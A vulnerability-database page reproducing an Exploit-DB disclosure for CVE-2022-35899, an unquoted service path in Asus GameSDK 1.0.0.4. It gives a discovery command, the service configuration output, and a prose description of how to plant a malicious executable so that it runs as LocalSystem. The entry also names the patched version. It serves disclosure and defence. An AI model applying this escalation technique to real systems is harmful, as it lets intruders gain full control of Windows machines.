Lucene search
K

Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path

🗓️ 29 Jul 2022 00:00:00Reported by Angelo Pio AmiranteType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 459 Views

Asus GameSDK v1.0.0.4 Unquoted Service Path allows arbitrary code executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Asus GameSDK 1.0.0.4 Unquoted Service Path Vulnerability
20 Jul 202200:00
zdt
ATTACKERKB
CVE-2022-35899
21 Jul 202217:15
attackerkb
Circl
CVE-2022-35899
22 Jul 202205:58
circl
CNNVD
ASUS GameSDK 代码问题漏洞
19 Jul 202200:00
cnnvd
CVE
CVE-2022-35899
21 Jul 202216:14
cve
Cvelist
CVE-2022-35899
21 Jul 202216:14
cvelist
GithubExploit
Exploit for Unquoted Search Path or Element in Asus Aura_Ready_Game_Software_Development_Kit
18 Jul 202214:06
githubexploit
EUVD
EUVD-2022-38772
3 Oct 202520:07
euvd
NVD
CVE-2022-35899
21 Jul 202217:15
nvd
OSV
CVE-2022-35899
21 Jul 202217:15
osv
Rows per page
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899

# Step to discover the unquoted service path:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Info on the service:

C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jul 2022 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 3.17.8
EPSS0.00194
459